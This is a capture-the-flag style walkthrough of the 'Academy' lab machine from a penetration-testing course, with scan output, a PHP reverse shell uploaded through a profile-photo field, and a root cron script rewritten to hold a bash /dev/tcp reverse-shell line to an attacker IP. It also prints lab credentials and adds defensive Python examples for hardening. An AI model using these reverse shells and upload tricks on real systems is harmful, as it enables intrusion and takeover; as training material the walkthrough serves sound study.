PEH Capstone
Walkthrough
Gaining a Foothold
Nmap
192.168.88.133
┌──(root㉿kali)-[~]
└─# nmap -p- -A -T4 192.168.88.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 02:31 EDT
Nmap scan report for 192.168.88.133
Host is up (0.00087s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.88.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.87 ms 192.168.88.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 seconds
Port 22
Interesting items:
SSH
OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Port 21
Interesting items:
FTP vsftpd 3.0.3
ftp-anon: Anonymous FTP login allowed (FTP code 230)
-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
FTP server status:
Connected to ::ffff:192.168.88.129
Logged in as ftp
TYPE: ASCII
No session bandwidth limit
Session timeout in seconds is 300
Control connection is plain text
Data connections will be plain text
At session startup, client count was 3
vsFTPd 3.0.3 - secure, fast, stable
Port 80
Interesting items:
HTTP
80/tcp open http Apache httpd 2.4.38 ((Debian))
http-server-header: Apache/2.4.38 (Debian)
http-title: Apache2 Debian Default Page: It works
Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation
https://www.exploit-db.com/exploits/46676
HTTP Request Smuggling attack
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-613554/Apache-Http-Server-2.4.38.html
Apache HTTP Server privilege escalation from modules' scripts (CVE-2019-0211)
mod_ssl access control bypass (CVE-2019-0215)
https://httpd.apache.org/security/vulnerabilities_24.html
Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)
https://httpd.apache.org/security/vulnerabilities_24.html
/icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
/phpmyadmin/: phpMyAdmin directory found.
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
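The "interesting items" above are exactly what a tester pulls out of the raw scan by hand. As an added example that is not part of the original notes, the script below parses nmap's normal output in the shape shown above and produces that kind of per-port list. The sample input is a constructed excerpt of the scan; the triage rules (anonymous FTP, files listed by ftp-anon, default page, version-disclosing Server header) are illustrative, not nmap's own.

```python
"""Triage nmap 'normal' output into the kind of per-port notes kept above.

Added example, not part of the original notes: it parses the shape of
nmap -A output shown in the scan above and pulls out what a tester (or a
defender reviewing their own exposure) would record per port. The sample
is a constructed excerpt of that scan; the triage rules are illustrative.
"""
import re

# Constructed sample in the shape of the scan output above.
SAMPLE_NMAP = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1000     1000          776 May 30  2021 note.txt
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|_  256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:12:8A:DE (VMware)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|[_ ]\s*([\w-]+):\s*(.*)$")            # "| name: value"
LISTING_RE = re.compile(r"^\|[_ ]\s*[-dl][rwx-]{9}\s+.*\s(\S+)$")  # ls-style line under ftp-anon


def parse_ports(text):
    """Return {port: {proto, state, service, version, scripts, files}}."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = ports[int(m.group(1))] = {
                "proto": m.group(2), "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": {}, "files": [],
            }
            continue
        if current is None:
            continue                      # header lines before the first port
        m = SCRIPT_RE.match(line)
        if m:
            current["scripts"][m.group(1)] = m.group(2)
            continue
        m = LISTING_RE.match(line)
        if m:
            current["files"].append(m.group(1))
    return ports


def triage(ports):
    """Turn parsed ports into findings; the rules below are illustrative, not nmap's."""
    findings = []
    for port, info in sorted(ports.items()):
        if info["state"] != "open":
            continue
        findings.append(f"{port}/{info['proto']} {info['service']}: {info['version']}")
        scripts = info["scripts"]
        if "allowed" in scripts.get("ftp-anon", "").lower():
            findings.append(f"{port}: anonymous FTP login allowed (vsftpd: set anonymous_enable=NO)")
        for name in info["files"]:
            findings.append(f"{port}: file readable without credentials: {name}")
        if "default page" in scripts.get("http-title", "").lower():
            findings.append(f"{port}: default web page served; application content lives elsewhere")
        if "http-server-header" in scripts:
            findings.append(f"{port}: Server header discloses version: {scripts['http-server-header']}")
    return findings


if __name__ == "__main__":
    for item in triage(parse_ports(SAMPLE_NMAP)):
        print(item)
```

Running it against the sample prints the three open services plus the anonymous-FTP, note.txt, default-page and Server-header items, which is the same set of observations recorded by hand above. For a real run, `nmap -oN` output can be fed straight into `parse_ports`.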
Nikto
┌──(root㉿kali)-[~]
└─# nikto -h http://192.168.88.133
- Nikto v2.5.0
- Target IP: 192.168.88.133
- Target Hostname: 192.168.88.133
- Target Port: 80
- Start Time: 2023-11-02 02:37:37 (GMT-4)
- Server: Apache/2.4.38 (Debian)
- /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
- /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
- No CGI Directories found (use '-C all' to force check all possible dirs)
- /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
- Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
- OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
- /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
- /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
- /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
- /phpmyadmin/: phpMyAdmin directory found.
- /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
- 8254 requests: 0 error(s) and 12 item(s) reported on remote host
- End Time: 2023-11-02 02:37:50 (GMT-4) (13 seconds)
- 1 host(s) tested
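Most of the nikto items above are response-header hygiene: a Server header that names the exact Apache version, no X-Frame-Options, no X-Content-Type-Options, and phpMyAdmin cookies set without HttpOnly. As an added example (not from the original notes and not nikto's code), the check below audits a response's headers for those issues; the two header sets are constructed, one mirroring the findings above and one showing the corrected form.

```python
"""Audit an HTTP response's headers for the issues nikto reported above.

Added example, not from the original notes or from nikto: the constructed
VULNERABLE response mirrors the findings (version-disclosing Server header,
missing X-Frame-Options / X-Content-Type-Options, cookies without HttpOnly)
and HARDENED shows the same response with those points corrected.
"""
import re

# (name, value) pairs rather than a dict, because Set-Cookie repeats.
VULNERABLE = [
    ("Server", "Apache/2.4.38 (Debian)"),
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "goto=index.php; path=/phpmyadmin/"),
    ("Set-Cookie", "back=index.php; path=/phpmyadmin/"),
]

HARDENED = [
    ("Server", "Apache"),
    ("Content-Type", "text/html; charset=UTF-8"),
    ("X-Frame-Options", "SAMEORIGIN"),
    ("X-Content-Type-Options", "nosniff"),
    ("Set-Cookie", "goto=index.php; path=/phpmyadmin/; HttpOnly; Secure; SameSite=Lax"),
    ("Set-Cookie", "back=index.php; path=/phpmyadmin/; HttpOnly; Secure; SameSite=Lax"),
]


def audit_headers(headers):
    """Return a list of issue strings; empty means the checked points are all in order."""
    single = {name.lower(): value for name, value in headers}   # last value wins
    issues = []
    csp = single.get("content-security-policy", "").lower()
    if "x-frame-options" not in single and "frame-ancestors" not in csp:
        issues.append("missing X-Frame-Options (or CSP frame-ancestors): clickjacking")
    if single.get("x-content-type-options", "").lower() != "nosniff":
        issues.append("missing X-Content-Type-Options: nosniff")
    server = single.get("server", "")
    if re.search(r"\d+\.\d+", server):
        issues.append(f"Server header discloses version: {server}")
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie = value.split("=", 1)[0]
        attrs = [a.strip().lower() for a in value.split(";")[1:]]
        if "httponly" not in attrs:
            issues.append(f"cookie {cookie} set without HttpOnly")
        if "secure" not in attrs:
            issues.append(f"cookie {cookie} set without Secure")
    return issues


if __name__ == "__main__":
    for label, headers in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(label, audit_headers(headers) or "no issues")
```

On Apache the HARDENED set corresponds to `ServerTokens Prod` plus mod_headers directives such as `Header always set X-Frame-Options "SAMEORIGIN"` and `Header always set X-Content-Type-Options "nosniff"`; the cookie flags belong in the application (or PHP's session settings) rather than being patched on at the web server.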
Default Web Page
Readme files exposed
Information Disclosure
404 - Information Disclosure
Server Header - Information Disclosure
/phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
version 4.9.7
MySQL
Login credentials exposed in plaintext in note.txt (readable over anonymous FTP)
login: 10201321
password hash: cd73502828457d15655bbd7a63fb0bc8
cracked password: student
Exposed admin credentials in config.php
Logged in as 10201321:student
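The hash in note.txt gave up the password immediately because it is an unsalted MD5 of a common word. As an added example (not from the original notes), the block below shows why a wordlist pass recovers it, then shows the storage form that would have resisted this: a salted, memory-hard KDF via hashlib.scrypt. OBSERVED_HASH is the value recorded above; the five-word list is constructed.

```python
"""Why the password hash in note.txt was recoverable, and how to store passwords instead.

Added example, not from the original notes. OBSERVED_HASH is the value from
note.txt above; the wordlist is a constructed handful of common words. The
storage functions use hashlib.scrypt (salted, memory-hard) to show the
contrast with an unsalted MD5 digest.
"""
import hashlib
import hmac
import os

OBSERVED_HASH = "cd73502828457d15655bbd7a63fb0bc8"   # from note.txt, as recorded above
WORDLIST = ["password", "admin", "welcome1", "student", "academy"]  # constructed

SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)    # ~16 MiB per guess


def md5_lookup(hexdigest, words):
    """An unsalted MD5 digest of a common word is matched by one pass over a wordlist."""
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == hexdigest:
            return word
    return None


def hash_password(password, salt=None):
    """Return 'salthex$keyhex' using a fresh 16-byte random salt."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return salt.hex() + "$" + key.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, key_hex = stored.split("$", 1)
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    print("MD5 wordlist match:", md5_lookup(OBSERVED_HASH, WORDLIST))
    stored = hash_password("student")
    print("scrypt record:", stored)
    print("verify 'student':", verify_password("student", stored))
    print("second record for the same password differs:", hash_password("student") != stored)
```

The salt means two users with the same password get different records and a precomputed table is useless; the scrypt cost means each guess is expensive rather than a single MD5 block. The same applies to the MySQL-side storage of these accounts, not only to notes left on an FTP share.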
Student login page on 192.168.88.133/academy
The profile photo upload under Student Registration > My Profile accepts any file type, not just images
Exploitation
PHP reverse shell uploaded instead of a photo in student registration
Reverse shell source: https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Edited the PHP reverse shell to point at the attacker machine's IP and port, and saved it
Listener set up on the attacker machine, then the reverse shell uploaded through the student registration photo field
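The foothold works because the upload handler trusts the client's filename and content. As an added example (not code from the Academy application, which is PHP), the block below puts a model of that trusting handler beside a hardened one: final-extension allowlist, magic-byte check against the declared type, a script-marker check as defence in depth, a random stored name, and no execute bit. The sample uploads are constructed.

```python
"""Profile-photo upload: the trusting check the notes describe beside a hardened one.

Added example, not code from the Academy application (which is PHP). The
'vulnerable' function models the behaviour in the notes: whatever the client
sends is stored under the client's filename. The hardened function enforces
an extension allowlist, checks magic bytes against the declared type, rejects
script markers as defence in depth, and stores under a random name. The
sample uploads in SAMPLES are constructed.
"""
import os
import secrets
import tempfile

# Extension -> bytes the content must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    pass


def vulnerable_save(filename, data, upload_dir):
    """Trusts the client completely: shell.php lands in the web root as shell.php."""
    path = os.path.join(upload_dir, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def hardened_save(filename, data, upload_dir, max_bytes=2_000_000):
    """Validate and store an image; raise UploadRejected otherwise."""
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    base = os.path.basename(filename)            # drop any client-supplied path
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()         # only the final extension counts
    if ext not in ALLOWED:
        raise UploadRejected(f".{ext} is not an allowed image type")
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match declared image type")
    # Defence in depth only: re-encoding the image with an image library is the
    # real answer to polyglots, and the decisive control is that the upload
    # directory never executes scripts (see the note after this block).
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise UploadRejected("script marker inside image data")
    new_name = secrets.token_hex(16) + "." + ("jpg" if ext == "jpeg" else ext)
    path = os.path.join(upload_dir, new_name)
    with open(path, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o640)                        # readable by the web server, never executable
    return path


def stored_name(filename, data):
    """Basename the hardened handler stores the upload under, or None if rejected."""
    with tempfile.TemporaryDirectory() as upload_dir:
        try:
            return os.path.basename(hardened_save(filename, data, upload_dir))
        except UploadRejected:
            return None


# Constructed samples: a minimal JPEG header and the upload shapes the notes describe.
SAMPLES = {
    "photo.jpg":     b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "shell.php":     b"<?php phpinfo(); ?>",                      # a PHP file in place of a photo
    "shell.php.jpg": b"<?php phpinfo(); ?>",                      # double extension, still PHP content
    "poly.jpg":      b"\xff\xd8\xff\xe0" + b"<?php phpinfo(); ?>",  # valid header, script in the body
}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:14} stored as: {stored_name(name, data)}")
```

The random name also defeats Apache's multiple-extension handling (`shell.php.jpg` can be handed to the PHP handler when `AddHandler` is used), but validation alone is not enough: the upload directory should sit outside the document root or have PHP disabled for it, for example with `php_admin_flag engine off` in that directory's configuration.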
Privilege escalation
Linpeas
Downloaded linpeas.sh on the attack machine and transferred it to the target by serving it from a web server on the attack machine and fetching it from the target
linpeas output: phpMyAdmin and other credentials exposed
ssh grimmie@192.168.137.129
My_V3ryS3cur3_P4ss
Pspy
Ran pspy64 as grimmie on the academy host to confirm that backup.sh runs every minute
Bash Reverse Shell
Edit the content of backup.sh to contain "bash -i >& /dev/tcp/192.168.137.128/8081 0>&1"
Gained root access after listening on port 8081
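The root escalation rests on one misconfiguration: a script that root's cron runs every minute is writable by an ordinary user. As an added example (not from the original notes), the audit below reads crontab lines in /etc/crontab form and checks, against real file metadata, whether each root job's script or its directory can be altered by someone other than the trusted account. The demo recreates the backup.sh situation in a throwaway directory; the crontab lines and file names are constructed, and because the demo runs unprivileged it passes the current user's uid as the trusted account where a production audit would leave the default of 0 (root).

```python
"""Audit system crontab entries for root jobs whose script a non-root user can edit.

Added example, not from the original notes. The weakness above (root runs
backup.sh every minute while grimmie can write to it) is reproduced in a
throwaway directory so the audit runs against real file metadata; the
crontab lines and file names are constructed. trusted_uid is the account
treated as privileged: the demo passes the current user's uid because it
runs unprivileged, a production audit would leave it at 0 (root).
"""
import os
import shlex
import stat
import tempfile


def _write_problems(path, trusted_uid):
    """Reasons why someone other than the trusted user could alter `path`."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_crontab(crontab_text, trusted_uid=0):
    """Return [(crontab line, problem)] for root jobs in /etc/crontab form
    (min hour dom mon dow user command) whose script or its directory is
    modifiable by an untrusted user. Checks the file and its parent directory;
    a full audit would walk every path component up to /."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                   # comment or VAR=value line
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue                                   # only root jobs matter here
        try:
            target = shlex.split(fields[6])[0]
        except ValueError:
            continue
        if not os.path.isabs(target):
            continue                                   # resolved via PATH; out of scope here
        schedule = " ".join(fields[:5])
        for path in (target, os.path.dirname(target)):
            if not os.path.exists(path):
                findings.append((line, f"{path} missing: whoever can create it runs as root"))
                break
            reasons = _write_problems(path, trusted_uid)
            if reasons:
                findings.append((line, f"{path} ({schedule}): " + ", ".join(reasons)))
    return findings


def demo():
    """Recreate the backup.sh situation and return the audit findings."""
    with tempfile.TemporaryDirectory() as work:        # mode 0700, owned by the current user
        vulnerable = os.path.join(work, "backup.sh")
        safe = os.path.join(work, "rotate.sh")
        for path in (vulnerable, safe):
            with open(path, "w") as fh:
                fh.write("#!/bin/bash\n# constructed placeholder script\n")
        os.chmod(vulnerable, 0o777)   # anyone on the box can rewrite what root will run
        os.chmod(safe, 0o755)         # owner-writable only
        crontab = f"""\
SHELL=/bin/sh
# constructed /etc/crontab excerpt
* * * * * root {vulnerable}
0 3 * * * root {safe}
"""
        return audit_crontab(crontab, trusted_uid=os.getuid())


if __name__ == "__main__":
    for line, problem in demo():
        print(f"{line}\n    {problem}")
```

The fix on the host is the mirror image of the finding: `chown root:root backup.sh` and `chmod 0755` it (or move it to a root-owned directory such as /root or /usr/local/sbin), and treat any change to a root-run script as an event worth alerting on, since file integrity monitoring would have caught the edited backup.sh before its next minute.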
Video
When you click the link below, it will start from the Academy Walkthrough.
Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 2)
Academy Walkthrough chapter starts at 5:05:22. Full course: https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course. Course resources/links: https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources
